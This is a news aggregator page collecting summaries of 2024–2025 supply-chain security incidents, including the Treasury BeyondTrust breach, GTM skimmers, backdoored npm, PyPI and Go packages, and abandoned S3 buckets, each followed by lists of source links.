CyberSecurity news

FlagThis - #supplychain

djohnson@CyberScoop - 59d

China Hack US Treasury via BeyondTrust - Chinese state-sponsored threat actors compromised the US Treasury Department by exploiting a vulnerability in a third-party software provider, BeyondTrust, accessing employee workstations and exfiltrating unclassified documents.
The US Treasury Department has confirmed a major cyber incident involving Chinese state-sponsored hackers who gained unauthorized access to employee workstations and unclassified documents. The breach occurred after a third-party software provider, BeyondTrust, was compromised, allowing the attackers to obtain a security key used for remote technical support. This key enabled the hackers to bypass security measures and remotely access Treasury systems and exfiltrate sensitive information. The Treasury was notified of the breach on December 8th and has been working with the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and other agencies to investigate the full impact of the incident.

The compromised BeyondTrust service has since been taken offline, and there is currently no evidence to suggest the threat actors still have access to Treasury systems. The Treasury Department has classified the incident as a “major incident” and has reaffirmed its commitment to bolstering cybersecurity defenses, highlighting the importance of addressing third-party vulnerabilities. The breach follows a series of other recent cyberattacks linked to China, further raising concerns about the security posture of the US government.

Recommended read:
References :
  • CyberScoop: Treasury workstations hacked by China-linked threat actors
  • Federal News Network: Treasury says Chinese hackers remotely accessed workstations, documents in ‘major’ cyber incident
  • siliconangle.com: Third-party provider hack exposes US Treasury Department unclassified documents
  • Techmeme: Letter: the US Treasury says China-backed hackers gained access to some Treasury workstations and unclassified docs; a vendor notified it of the hack on Dec. 8 (Zack Whittaker/TechCrunch)
  • bsky.app: Chinese state-sponsored hackers broke into the U.S. Treasury Department this month and stole documents from its workstations, according to a letter to lawmakers
  • Chuck Darwin: US treasury’s workstations breached in cyber-attack by China – report A Chinese state-sponsored actor broke into the US treasury department earlier this month and stole documents from its workstations, according to a letter to lawmakers that was provided to Reuters on Monday.
  • www.theguardian.com: US treasury’s workstations breached in cyber-attack by China – report
  • techcrunch.com: US Treasury says China accessed government documents in ‘major’ cyberattack
  • cyberscoop.com: Treasury workstations hacked by China-linked threat actors
  • techcrunch.com: Letter: the US Treasury says China-backed hackers gained access to some Treasury workstations and unclassified docs; a vendor notified it of the hack on Dec. 8 (Zack Whittaker/TechCrunch)
  • International homepage: ‘In a letter to 🇺🇸 Senate banking committee seen by the Financial Times, the department said it had been informed on December 8 by software company BeyondTrust that a hacker had breached several remote government workstations by obtaining a security key and had in turn gained access to unclassified documents on them.’
  • www.benzinga.com: China-Linked Hackers Breach US Department Of Treasury
  • malware.news: Chinese-sponsored hackers accessed Treasury documents in ‘major incident’
  • www.cnn.com: CNN: China-backed hackers breached US Treasury workstations.
  • Michael West: Treasury says Chinese hackers accessed workstations
  • SiliconANGLE: Third-party provider hack exposes US Treasury Department unclassified documents
  • www.pymnts.com: Treasury Department Workstations Breached by Hackers via Third-Party Vendor
  • www.engadget.com: The US Treasury Department says it was hacked in a China-linked cyberattack
  • federalnewsnetwork.com: Treasury says Chinese hackers remotely accessed workstations, documents in ‘major’ cyber incident
  • WIRED: US Treasury Department confirms hack by China-backed group.
  • bsky.app: The U.S. Treasury announced a major cyberattack linked to a compromised API key from its contractor, BeyondTrust.
  • securityonline.info: Treasury Department Hit by Major Cybersecurity Incident, China Suspected
  • PYMNTS.com: Treasury Department Workstations Breached by Hackers via Third-Party Vendor
  • san.com: Chinese-sponsored hackers behind ‘major’ breach: Treasury Department
  • securityaffairs.com: China-linked threat actors breached the U.S. Treasury Department by hacking a remote support platform used by the agency.
  • Hong Kong Free Press HKFP: US Treasury says was targeted by China state-sponsored cyberattack.
  • The Hacker News: The United States Treasury Department said it suffered a 'major cybersecurity incident' that allowed suspected Chinese threat actors to remotely access some computers and unclassified documents.
  • Fortune | FORTUNE: Treasury Department says a China state-sponsored cyberattack gained access to workstations and documents
  • securityonline.info: Treasury Department Hit by Major Cybersecurity Incident, China Suspected
  • gbhackers.com: US Treasury Department Breach, Hackers Accessed Workstations.
  • SAN: Investigators accuse China of hacking U.S. Treasury Department computers.
  • blog.gitguardian.com: What Happened in the U.S. Department of the Treasury Breach? A Detailed Summary.
  • DataBreaches.Net: Chinese hackers breached Treasury Department workstations, documents in ‘major cybersecurity incident’.
  • go.theregister.com: US Treasury Department outs the blast radius of BeyondTrust's key leak
  • www.wired.com: US Department Admits It Got by Treasury says accessed “certain documents” in a “major” breach, but experts believe the attack’s impacts could prove to be more significant as new details emerge.
  • www.bleepingcomputer.com: US Treasury Department breached through remote support platform L: C: posted on 2024.12.31 at 21:39:28 (c=2, p=3)
  • Hacker News: US Treasury Department breached through remote support platform L: C: posted on 2024.12.31 at 21:39:28 (c=2, p=3)
  • OODAloop: What to know about string of US hacks blamed on China
  • Techmeme: Sources: Chinese government hackers breached the US Treasury Department's OFAC, which administers economic sanctions, and two other Treasury offices (Washington Post)
  • Dataconomy: According to the Washington Post Chinese government hackers compromised the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) in December, targeting intelligence related to economic sanctions, officials reported.
  • Carly Page: China-backed hackers reportedly compromised the US Treasury’s highly sensitive sanctions office during December cyberattack
  • techcrunch.com: Chinese government hackers targeted the U.S. Treasury’s highly sensitive sanctions office during a December cyberattack, according to reports.
  • techcrunch.com: Chinese government hackers targeted US Treasury’s sanctions office during December cyberattack
  • Cybernews: On Thursday, it was revealed that PRC-backed hackers behind last month’s US Treasury hack accessed some senior officials' laptops.
  • Bloomberg Technology: Sources: China-backed hackers accessed the computers of senior US Treasury officials; the department's email system and classified data were not breached (Bloomberg)
  • www.techmeme.com: Sources: China-backed hackers accessed the computers of senior US Treasury officials; the department's email system and classified data were not breached (Bloomberg)
  • Techmeme: Sources: China-backed hackers accessed the computers of senior US Treasury officials; the department's email system and classified data were not breached (Bloomberg)
  • The Hacker News: CISA: No Wider Federal Impact from Treasury Cyber Attack, Investigation Ongoing
  • www.helpnetsecurity.com: CISA says Treasury was the only US agency breached via BeyondTrust -backedattacks 'tmiss
  • www.the420.in: Chinese APT Exploits BeyondTrust Vulnerability to Breach U.S. Treasury Systems
  • Pyrzout :vm:: CISA says Treasury was the only US agency breached via BeyondTrust -backedattacks 'tmiss
  • Help Net Security: CISA says Treasury was the only US agency breached via BeyondTrust
  • industrialcyber.co: US Treasury sanctions Beijing’s Integrity Tech for Flax Typhoon cyber intrusions on critical infrastructure
  • ciso2ciso.com: CISA: Third-Party Data Breach Limited to Treasury Dept. – Source: www.darkreading.com
  • Latest from TechRadar: Chinese cybersecurity firm hit by US sanctions over ties to Flax Typhoon hacking group
Pierluigi Paganini@securityaffairs.com - 17d

Google Tag Manager Exploited to Deploy Credit Card Skimmers - Hackers exploited a vulnerability in Google Tag Manager (GTM) to deploy credit card skimmers on Magento-based e-commerce websites, using malicious code disguised as a standard GTM and Google Analytics script to steal credit card information.
References: Sucuri Blog , ciso2ciso.com , ...
Hackers are exploiting Google Tag Manager (GTM) to deploy credit card skimmers on Magento-based e-commerce websites. According to reports from The Hacker News, Sucuri, and CISO2CISO, malicious actors are leveraging GTM to deliver malware that targets sensitive payment data. The attack involves injecting code that appears to be a standard GTM or Google Analytics script but contains an obfuscated backdoor. This allows the attackers to gain persistent access to the websites.

Sucuri's investigation into a customer's Magento site revealed that credit card details were being stolen via a skimmer loaded from the cms_block.content database table. The GTM tag contained encoded JavaScript designed to collect and transmit sensitive user data entered during the checkout process to a remote server controlled by the attackers. This highlights the importance of securing third-party integrations and regularly monitoring website files for any suspicious code.

Recommended read:
References :
  • Sucuri Blog: Sucuri warns of credit card data theft from website.
  • ciso2ciso.com: Hackers Exploit Google Tag Manager
  • The Hacker News: The Hacker News reports on hackers exploiting Google Tag Manager to deploy credit card skimmers.
  • : Sucuri : Title is straightforward: Sucuri warns of credit card data theft from a customer's Magento-based eCommerce website. The credit card skimmer malware is delivered by leveraging Google Tag Manager (GTM). GTM is a free tool from Google that allows website owners to manage and deploy marketing tags on their website without needing to modify the site’s code directly.
  • ciso2ciso.com: Hackers Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Stores – Source:thehackernews.com
  • securityaffairs.com: Sucuri researchers observed threat actors leveraging Google Tag Manager (GTM) to install e-skimmer software on Magento-based e-stores.
  • Security Intelligence: Threat actors have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware targeting Magento-based e-commerce websites.
  • www.scworld.com: Magento stores compromised with Google Tag Manager skimmer
  • gbhackers.com: Information on hackers exploiting Google Tag Manager to steal credit card data from e-commerce sites.
  • securityonline.info: SecurityOnline article on hackers exploiting Google Tag Manager.
  • gbhackers.com: Hackers Exploiting Google Tag Managers to Steal Credit Card from eCommerce Sites
  • securityonline.info: Hackers Exploit Google Tag Manager to Steal Credit Card Data from Magento Sites
  • Sucuri Blog: Recently, we had a client come to us concerned that their website was infected with credit card stealing malware, often referred to as MageCart. Their website was running on Magento, a popular eCommerce content management system that skilled attackers often target to steal as many credit card numbers as possible.
  • Search Engine Journal: Hackers Use Google Tag Manager to Steal Credit Card Numbers
  • www.searchenginejournal.com: Hackers Use Google Tag Manager to Steal Credit Card Numbers
MalBot@malware.news - 69d

Supply Chain Attack on Open Source Packages - Multiple open-source packages on npm were compromised with cryptomining malware via compromised maintainer accounts and stolen API tokens.
A supply chain attack has compromised open-source packages associated with rspack and vant, injecting cryptomining malware. The compromised packages had hundreds of thousands of weekly downloads, posing a significant threat to users of these projects. The affected version is 1.1.7. This event underscores the growing threat of supply chain attacks targeting open-source software projects. The vulnerability emphasizes the need for stronger security protocols in open-source ecosystems and for better vetting of dependencies.

Recommended read:
References :
  • malware.news: Open source in the crosshairs: New cryptomining hacks highlight key threat
  • The Hacker News: TheHackerNews article about Rspack npm packages compromised with crypto mining malware.
  • AAKL: Socket, from yesterday: Supply Chain Attack on Rspack npm Packages Injects Cryptojacking Malware More:
  • Security Risk Advisors: Supply Chain Attack on Rspack npm Packages Deploys Cryptojacking Malware
  • Blog (Main): ReversingLabs reports on cryptomining hacks in open source projects.
  • socket.dev: Open source in the crosshairs: New cryptomining hacks highlight key threat
  • www.bleepingcomputer.com: Three popular npm packages, @rspack/core, @rspack/cli, and Vant, were compromised through stolen npm account tokens, allowing threat actors to publish malicious versions that installed cryptominers.
  • Osint10x: Rspack npm Packages Compromised with Crypto Mining Malware in Supply Chain Attack
  • Osint10x: OSINT10X reports on cryptomining hacks on open source packages.
  • BleepingComputer: Three popular npm packages, @rspack/core, @rspack/cli, and Vant, were compromised through stolen npm account tokens, allowing threat actors to publish malicious versions that installed cryptominers.
  • Security Boulevard: OSS in the crosshairs: Cryptomining hacks highlight key new threat
  • 2024 Sonatype Blog: npm packages from Rspack, Vant compromised, blocked by Sonatype
  • www.npmjs.com: npm packages from Rspack, Vant compromised, blocked by Sonatype
  • malware.news: Supply chain attack compromises rspack, Vant packages with XMRig cryptominer
  • securityonline.info: Rspack Supply Chain Attack Injects Cryptojacking Malware Into npm Ecosystem
  • www.scworld.com: Supply chain attack compromises rspack, Vant packages with XMRig cryptominer
  • osint10x.com: Supply Chain Attack Hits Rspack, Vant npm Packages with Monero Miner
  • securityonline.info: Rspack Supply Chain Attack Injects Cryptojacking Malware Into npm Ecosystem
  • Osint10x: Supply Chain Attack Hits Rspack, Vant npm Packages with Monero Miner
  • hackread.com: Supply Chain Attack Hits Popular Rspack and Vant npm Packages with Monero Miner
Jessica Lyons@theregister.com - 23d

Abandoned AWS S3 Buckets Facilitate Software Supply Chain Hijacking - Researchers have uncovered a critical security vulnerability in abandoned Amazon Web Services (AWS) S3 buckets that could enable attackers to hijack the global software supply chain.
Researchers at watchTowr Labs have uncovered a significant security flaw involving abandoned Amazon Web Services (AWS) S3 buckets, potentially allowing attackers to compromise the software supply chain. The analysis revealed that nearly 150 S3 buckets previously used by various organizations, including cybersecurity firms, governments, Fortune 500 companies, and open source projects, could be re-registered. This re-registration could enable attackers to inject malicious code or executables into deployment processes and software update mechanisms.

Over a two-month period, these abandoned buckets received over eight million HTTPS requests for various files, including software updates and other binary artifacts. The requests originated from a wide range of sources, including government networks in multiple countries, military networks, Fortune 100 and 500 companies, and even cybersecurity companies. This vulnerability could allow threat actors to deliver malware or backdoors to these organizations, leading to widespread security breaches. AWS has since blocked the specific buckets identified by watchTowr to prevent their re-creation and potential misuse.

Recommended read:
References :
  • The Register - Security: Abandoned AWS S3 buckets can be reused in supply-chain attacks that would make SolarWinds look 'insignificant'
  • : watchTowr : Abandoned AWS S3 buckets could be reused to conduct supply chain attacks.
  • go.theregister.com: Abandoned AWS S3 buckets can be reused in supply-chain attacks that would make SolarWinds look 'insignificant' When cloud customers don't clean up after themselves, part 97 Abandoned AWS S3 buckets could be reused to hijack the global software supply chain in an attack that would make Russia's "SolarWinds adventures look amateurish and insignificant," watchTowr Labs security researchers have claim…
  • www.theregister.com: watchTowr : Abandoned AWS S3 buckets could be reused to conduct supply chain attacks.
  • labs.watchtowr.com: WatchTowr Labs research details 8 million requests against AWS S3 buckets.
  • www.csoonline.com: Code references to nonexistent cloud assets continue to pose significant security risks, and the problem is only growing. Recent research identified approximately 150 AWS S3 storage buckets once used by various software projects to host sensitive scripts, configuration files, software updates, and other binary artifacts that were automatically downloaded and executed on user machines.
  • www.scworld.com: Nearly 150 S3 buckets previously leveraged by cybersecurity firms, governments, Fortune 500 companies, and open source projects could be re-registered with the same AWS account name to facilitate executable and/or code injections in the deployment code/software update mechanism, according to an analysis from watchTowr Labs researchers.
  • www.securityweek.com: Abandoned Amazon S3 Buckets Enabled Attacks Against Governments, Big Firms
  • BleepingComputer: How attackers abuse S3 Bucket Namesquatting — And How to Stop Them
  • SecurityWeek: Abandoned Amazon S3 Buckets Enabled Attacks Against Governments, Big Firms
  • therecord.media: Researchers warn of risks tied to abandoned cloud storage buckets
  • Jon Greig: Researchers at Watchtowr warned of malicious actors taking over abandoned AWS S3 buckets used by governments, militaries, Fortune 500 companies and even some cybersecurity firms
  • darkreading: Researchers from watchTowr discovered around 150 Amazon Web Services S3 buckets that were formerly used by organizations for software deployment and updates but were then abandoned.
Jeff Burt@DevOps.com - 23d

Typosquatting in the Go Ecosystem - A malicious package imitating BoltDB in the Go ecosystem contains a backdoor for remote code execution, exploiting the Go Module Mirror's caching mechanism.
References: ciso2ciso.com , lobste.rs , bsky.app ...
A malicious package imitating the popular BoltDB module has been discovered in the Go ecosystem. This package contains a backdoor that enables remote code execution, posing a significant security risk to developers using the compromised module. The malicious package, a typosquat of BoltDB, was discovered by researchers at Socket, an application security company.

This attack exploits the Go Module Mirror's caching mechanism, allowing the malware to persist undetected despite manual code reviews. After the malware was cached by the Go Module Mirror, the git tag was strategically altered on GitHub to remove traces of malicious code and hide it from manual review. To mitigate software supply-chain threats, Socket advises developers to verify package integrity before installation, analyze dependencies for anomalies, and use security tools that inspect installed code at a deeper level.

Recommended read:
References :
  • ciso2ciso.com: Source: thehackernews.com – Author: . Cybersecurity researchers have called attention to a software supply chain attack targeting the Go ecosystem that involves a malicious package capable of granting the adversary remote access to infected systems.
  • lobste.rs: Go Supply Chain Attack: Malicious Package Exploits Go Module Proxy Caching for Persistence
  • The Hacker News: Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access
  • bsky.app: Socket Security has discovered a malicious Go module for the BoltDB database that contains a hidden backdoor. The module is cached in the Go Module Mirror, the first attack documented making it in the the Go Module Mirror despite manual code reviews. https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence
  • ciso2ciso.com: Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access
  • fosstodon.org: Socket: Go Supply Chain Attack: Malicious Package Exploits Go Module Proxy Caching for Persistence
  • DevOps.com: Typosquat Supply Chain Attack Targets Go Developers
  • securityonline.info: Socket researchers have discovered a malicious typosquatting package in the Go ecosystem that exploits the Go Module Proxy’s
  • securityonline.info: Socket researchers have discovered a malicious typosquatting package in the Go ecosystem that exploits the Go Module Proxy’s The post appeared first on .
  • www.infoworld.com: Malicious package found in the Go ecosystem
  • ciso2ciso.com: Malicious package found in the Go ecosystem – Source: www.infoworld.com
  • ciso2ciso.com: Source: www.infoworld.com – Author: The malicious package, a typosquat of the popular BoltDB module, is said to be among the first known exploits of the Go Module Mirror’s indefinite module caching.
  • heise online English: Typosquatting in the Go ecosystem: Fake BoltDB package discovered A malicious package in the Go ecosystem imitates BoltDB and contains a backdoor. Attackers used the caching service to spread the malware unnoticed.
  • www.heise.de: Typosquatting in the Go ecosystem: Fake BoltDB package discovered
info@thehackernews.com (The Hacker News)@The Hacker News - 17d

XE Group Exploits VeraCore Zero-Day for Web Shells - The XE Group, a cybercrime group initially focused on credit card skimming, has shifted its tactics to exploit zero-day vulnerabilities for persistent access, targeting software products like VeraCore and deploying reverse shells and web shells.
The cybercrime group XE Group has shifted its tactics from credit card skimming to exploiting zero-day vulnerabilities, with a recent focus on VeraCore software. This involves deploying reverse shells and web shells to maintain persistent remote access to compromised systems, targeting supply chains in the manufacturing and distribution sectors. The group has been active since at least 2010, marking a significant shift in their operational priorities towards targeted information theft.

The vulnerabilities exploited include CVE-2024-57968, an unrestricted file upload flaw, and CVE-2025-25181, an SQL injection vulnerability. These shortcomings are being chained to deploy ASPXSpy web shells for unauthorized access to infected systems, enabling file system enumeration, data exfiltration, and the execution of SQL queries. The exploitation activity was discovered in November 2024, with evidence suggesting the group leveraged CVE-2025-25181 as early as 2020.

Recommended read:
References :
  • securityaffairs.com: XE Group shifts from credit card skimming to exploiting zero-days
  • The Hacker News: XE Hacker Group Exploits VeraCore Zero-Day to Deploy Persistent Web Shells
  • ciso2ciso.com: XE Hacker Group Exploits VeraCore Zero-Day to Deploy Persistent Web Shells – Source:thehackernews.com
  • ciso2ciso.com: XE Hacker Group Exploits VeraCore Zero-Day to Deploy Persistent Web Shells – Source:thehackernews.com
  • Blog: Article about the XE group exploiting Veracore zero-day to deploy persistent web shells.
  • www.scworld.com: Report details how XE Group exploited a VeraCore zero-day to deploy reverse shells and web shells.
  • SOC Prime Blog: SOCRadar: Detect XE Group Attacks
  • intezer.com: Intezer's Nicole Fishbein, Joakim Kennedy & Justin Lentz provide an in-depth analysis of XE Group’s recent operations, looking at the exploits used, persistence mechanisms, and attack methodologies.
  • socprime.com: XE Group, likely a Vietnam-linked hacking collective that has been active in the cyber threat arena for over a decade is believed to be behind the exploitation of a couple of VeraCore zero-day vulnerabilities.
  • Virus Bulletin: Intezer's Nicole Fishbein, Joakim Kennedy & Justin Lentz provide an in-depth analysis of XE Group’s recent operations, looking at the exploits used, persistence mechanisms, and attack methodologies.
  • securityaffairs.com: The cybercrime group XE Group exploited a VeraCore zero-day to deploy reverse shells, web shells in recent attacks.
  • securityaffairs.com: Analysis of the XE Group's recent operations and their use of VeraCore zero-day vulnerabilities to deploy reverse shells and web shells.
@feeds.feedburner.com - 81d

Malicious Code Found in Solana's Popular web3.js npm Library - A supply chain attack compromised the @solana/web3.js npm library, stealing private keys.
A critical security flaw has been discovered in versions 1.95.6 and 1.95.7 of the widely used @solana/web3.js npm library, a JavaScript tool crucial for Solana blockchain applications. This supply chain attack, affecting over 350,000 weekly downloads, injected malicious code designed to steal private keys. The compromised code, concealed within legitimate code paths, exfiltrated private keys to a hardcoded Solana address (FnvLGtucz4E1ppJHRTev6Qv4X7g8Pw6WPStHCcbAKbfx) via Cloudflare headers, potentially leading to cryptocurrency theft from both developers and end-users. The attack, believed to stem from a phishing or social engineering campaign against library maintainers, underscores the vulnerability of software supply chains in the crypto space.

Developers are strongly urged to immediately update to version 1.95.8 or downgrade to version 1.95.5 of the @solana/web3.js library. Those who suspect their keys may be compromised are advised to rotate their authority keys. The compromised versions are no longer available for download. While non-custodial wallets are not affected, this incident highlights the serious risks associated with compromised open-source libraries and the importance of vigilant security practices within the development ecosystem. The compromised versions, which attracted over 50 million downloads, were identified and reported across several cybersecurity news outlets including Malware News, BleepingComputer, Cyber Insider, and The Hacker News.

Recommended read:
References :
  • The Hacker News: The Hacker News discusses the backdoor discovered in Solana's Web3.js npm library.
  • Help Net Security: Solana’s popular web3.js library backdoored in supply chain compromise
  • CyberInsider: Supply chain attack on Solana core library
  • www.bleepingcomputer.com: Solana's web3.js library was backdoored to steal secret private keys via a supply chain attack, affecting cryptocurrency wallets.
  • socket.dev: Supply chain attack: Solana web3.js library
  • bsky.app: The legitimate Solana JavaScript SDK was temporarily compromised by a supply chain attack, resulting in malicious code stealing cryptocurrency private keys.
  • malware.news: Malware News reports on the malware found in Solana's npm library with 50M downloads.
  • www.bleepingcomputer.com: BleepingComputer reports on the malicious Solana packages found on npm.
  • bsky.app: Analysis of the Solana package revealed malicious URLs designed to exfiltrate private keys.
  • Security Risk Advisors: Supply Chain Attack Compromises Solana’s web3.js Library, Targets Private Keys
  • sra.io: SRA.io article mentioning the Solana vulnerability.
  • arstechnica.com: Backdoor slipped into popular code library, drains ~$155k from digital wallets | Ars Technica "The backdoor came in the form of code that collected private keys and wallet addresses when apps that directly handled private keys incorporated solana-web3.js versions 1.95.6 and 1.95.7. These backdoored versions were available for download during a five-hour window between 3:20 pm UTC and 8:25 pm UTC on Tuesday"
  • www.heise.de: Supply chain attack: Solana web3.js library was infected with malicious code Unknown attackers have equipped Solana's JavaScript SDK with malicious code to steal private keys.
info@thehackernews.com (The Hacker News)@The Hacker News - 52d

Malicious NPM Packages Target Ethereum Devs - Malicious npm packages impersonating Hardhat plugins are targeting Ethereum developers to steal private keys and sensitive data using a supply chain vulnerability.
Ethereum developers are being targeted by a supply chain attack involving malicious npm packages designed to look like legitimate Hardhat plugins. These fake packages, with names closely resembling real ones, are being used to steal sensitive data, including private keys and mnemonics. Researchers have identified at least 20 of these malicious packages, which have collectively been downloaded over 1,000 times. The attack exploits trust in the open-source ecosystem, specifically within the npm registry. Once installed, the malicious packages use Hardhat runtime functions to collect sensitive information and transmit it to attacker-controlled endpoints.

The attackers are using Ethereum smart contracts to store and distribute Command & Control (C2) server addresses, making it more difficult to disrupt their infrastructure. This strategy, combined with using hardcoded keys and Ethereum addresses, enables efficient data exfiltration. The campaign is attributed to a Russian-speaking threat actor known as "_lain." The compromised development environments could lead to backdoors in production systems and significant financial losses for affected developers. Developers are urged to verify package authenticity, inspect source code, and exercise caution when using package names.

Recommended read:
References :
  • ciso2ciso.com: Malicious npm packages target Ethereum developers – Source: securityaffairs.com
  • securityaffairs.com: Malicious npm packages target Ethereum developers
  • The Hacker News: Cybercriminals Target Ethereum Developers with Fake Hardhat npm Packages
  • ciso2ciso.com: Malicious npm packages target Ethereum developers – Source: securityaffairs.com
  • gbhackers.com: Malicious npm Packages Stealing Developers’ Sensitive Data
  • osint10x.com: Russian-Speaking Attackers Target Ethereum Devs with Fake Hardhat npm Packages
  • Osint10x: Russian-Speaking Attackers Target Ethereum Devs with Fake Hardhat npm Packages
  • gbhackers.com: Malicious npm Packages Stealing Developers’ Sensitive Data
do son@securityonline.info - 72d

Critical OpenWrt Firmware Update Vulnerability - A critical vulnerability in OpenWrt’s ASU service allows attackers to inject malicious firmware images.
A critical vulnerability (CVE-2024-54143) in OpenWrt’s Attended SysUpgrade (ASU) server allowed attackers to inject malicious firmware images during updates. The vulnerability exploited a truncated SHA-256 hash collision and a command injection flaw, putting many routers at risk. OpenWrt developers quickly addressed the vulnerability in updated releases. This attack highlights the criticality of securing the firmware update process and the risk of supply chain attacks affecting embedded devices.

Recommended read:
References :
  • Cyber Security News: Information about the OpenWrt supply chain attack that uses a SHA-256 collision and command injection.
  • malware.news: Details about a critical OpenWrt vulnerability enabling malicious firmware installation.
  • securityonline.info: Report on the vulnerability in OpenWrt's Attended SysUpgrade (ASU) server that allows for firmware poisoning.
  • socradar.io: Details about the critical vulnerability (CVE-2024-54143) in OpenWrt’s Attended SysUpgrade (ASU) server, allowing attackers to compromise firmware integrity.
  • www.bleepingcomputer.com: Security researcher RyotaK discovered a vulnerability in OpenWrt's sysupgrade mechanism that allows for command injection.
  • www.scworld.com: Critical OpenWrt bug enabling malicious firmware image installation addressed
MalBot@malware.news - 51d

Illumina DNA Sequencer Vulnerable BIOS Found - Critical BIOS/UEFI vulnerabilities found in Illumina iSeq 100 DNA gene sequencer due to outdated firmware, allowing attackers to overwrite firmware and potentially brick the device or install malware.
Researchers at Eclypsium have uncovered critical security flaws in the Illumina iSeq 100 DNA gene sequencer. The device utilizes an outdated BIOS firmware implementation, employing Compatibility Support Mode (CSM) without Secure Boot or standard firmware write protections. This vulnerability allows an attacker with system access to overwrite the firmware. This could potentially disable the device entirely or install persistent malware.

The identified security gaps underscore the substantial risks associated with reusing commodity hardware and neglecting regular firmware updates. The lack of modern security measures in the iSeq 100 presents a major supply chain vulnerability. This also highlights the need for stringent security protocols and configuration management to protect devices that handle sensitive genomic data, as outlined by NIST guidelines published in 2023.

Recommended read:
References :
  • malware.news: Genetic Engineering Meets Reverse Engineering: DNA Sequencer's Vulnerable BIOS
  • eclypsium.com: Genetic Engineering Meets Reverse Engineering: DNA Sequencer's Vulnerable BIOS
  • : Eclypsium identified BIOS/UEFI vulnerabilities in a popular DNA gene sequencer by healthcare technology vendor Illumina.
  • The Hacker News: Researchers Uncover Major Security Flaw in Illumina iSeq 100 DNA Sequencers
  • BleepingComputer: BIOS/UEFI vulnerabilities in the iSeq 100 DNA sequencer from U.S. biotechnology company Illumina could let attackers disable devices used for detecting illnesses and developing vaccines.
  • gbhackers.com: Critical BIOS/UEFI Vulnerabilities Allow Attackers To Overwrite System Firmware
  • securityonline.info: DNA Sequencer BIOS Vulnerabilities Pose Significant Supply Chain Risks
  • securityonline.info: DNA Sequencer BIOS Vulnerabilities Pose Significant Supply Chain Risks
  • ciso2ciso.com: Insecure Medical Devices — Illumina DNA Sequencer Illuminates Risks
MalBot@malware.news - 65d

Malicious PyPI Packages Steal Credentials - Multiple open-source packages on npm were compromised with cryptomining malware via compromised maintainer accounts and stolen API tokens.
Researchers have identified two malicious packages, zebo and cometlogger, on the Python Package Index (PyPI) repository. These packages are designed to steal sensitive information such as login credentials and social media accounts from compromised systems. The malicious code was actively downloaded by users. The incident highlights the increasing need for vigilance when using open-source software and the potential for supply chain attacks.

Recommended read:
References :
  • The Hacker News: The Hacker News reports on researchers uncovering PyPI packages stealing keystrokes and hijacking social accounts.
  • Techzine Global: Two malicious Python packages revealed by FortiGuard Labs
  • ciso2ciso.com: Python Malware in Zebo-0.1.0 and Cometlogger-0.1 Found Stealing User Data – Source:hackread.com
  • ciso2ciso.com: Python Malware in Zebo-0.1.0 and Cometlogger-0.1 Found Stealing User Data – Source:hackread.com
  • osint10x.com: Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts
  • securityonline.info: PyPI Poisoned: “Zebo” and “Cometlogger” Downloaded Hundreds of Times
@securityonline.info - 51d

Hackers Weaponize OAST in NPM, PYPI, Ruby - Hackers are weaponizing security testing tools using OAST techniques in npm, PyPI, and RubyGems to steal developer secrets and establish command and control channels, impersonating legitimate libraries to steal data and user information.
Hackers are increasingly weaponizing legitimate security testing tools, specifically Out-of-Band Application Security Testing (OAST) techniques, within the npm, PyPI, and RubyGems ecosystems. Malicious packages are being used to exfiltrate sensitive data and establish command and control channels, allowing for multi-stage attacks using what appears to be legitimate infrastructure. These packages often impersonate genuine libraries to steal developer secrets. For example, one campaign targeted Ethereum developers by mimicking Hardhat plugins to obtain private keys and configuration details. In some cases, threat actors are using a mix of methods, from high versioning to typosquatting of package names to deceive developers into downloading the malicious payloads.

These malicious packages are collecting a range of information, including user system information like hostname, username, working directories, and private keys. This data is often encrypted and transmitted to attacker-controlled endpoints using hardcoded keys and Ethereum addresses. Notably, OAST services such as oastify.com and oast.fun are being abused to exfiltrate this stolen information. This method is particularly dangerous as it allows attackers to perform stealthy reconnaissance and data theft while bypassing basic intrusion detection systems. The exploitation of these ecosystems underscores the need for developers to be vigilant and implement stricter auditing practices.

Recommended read:
References :
  • Cyber Security News: Hackers Weaponize npm, PyPI, & Ruby for Devastating Exploit Packages
  • gbhackers.com: Hackers Weaponize Security Testing By Weaponizing npm, PyPI, & Ruby Exploit Packages
  • securityonline.info: Malicious Packages Weaponize OAST for Stealthy Data Exfiltration and Reconnaissance
  • cyberpress.org: Hackers Weaponize npm, PyPI, & Ruby for Devastating Exploit Packages
  • gbhackers.com: Hackers Weaponize Security Testing By Weaponizing npm, PyPI, & Ruby Exploit Packages
  • securityonline.info: Malicious Packages Weaponize OAST for Stealthy Data Exfiltration and Reconnaissance
CISO2CISO Editor 2@ciso2ciso.com - 26d

Lumma Stealer Distributed through GitHub Infrastructure - A sophisticated malware campaign distributes Lumma Stealer and other malware through GitHub, exploiting its release infrastructure.
A new, sophisticated cyber campaign is utilizing GitHub's infrastructure to distribute the Lumma Stealer malware, a notorious data-stealing tool. This campaign doesn't only focus on Lumma Stealer, it also distributes other malicious software including SectopRAT, Vidar, and Cobeacon. Attackers are exploiting the platform's release mechanisms to gain initial access to systems and subsequently deploy these harmful payloads. This tactic has allowed the threat actors to leverage a trusted platform, tricking users into downloading files from malicious URLs, thereby increasing the risk of widespread infections.

Trend Micro researchers have analyzed the tactics, techniques and procedures (TTPs) used in this campaign and found significant similarities with those used by the Stargazer Goblin group, indicating a potential connection between the two. The Lumma Stealer malware is known for extracting credentials, cryptocurrency wallets, system details, and other sensitive files. SOC Prime Platform has released detection content aimed at helping security teams proactively identify and thwart related threats. This includes Sigma rules for Lumma Stealer, SectopRAT, Vidar, and Cobeacon detection, highlighting the ongoing efforts to counter this dangerous threat.

Recommended read:
References :
  • ciso2ciso.com: Lumma Stealer, nefarious info-stealing malware, resurfaces in the cyber threat arena. Defenders recently uncovered an advanced adversary campaign distributing Lumma Stealer through GitHub infrastructure along with other malware variants, including SectopRAT, Vidar, and Cobeacon.
  • SOC Prime Blog: Lumma Stealer, nefarious info-stealing malware, resurfaces in the cyber threat arena. Defenders recently uncovered an advanced adversary campaign distributing Lumma Stealer through GitHub infrastructure along with other malware variants, including SectopRAT, Vidar, and Cobeacon.
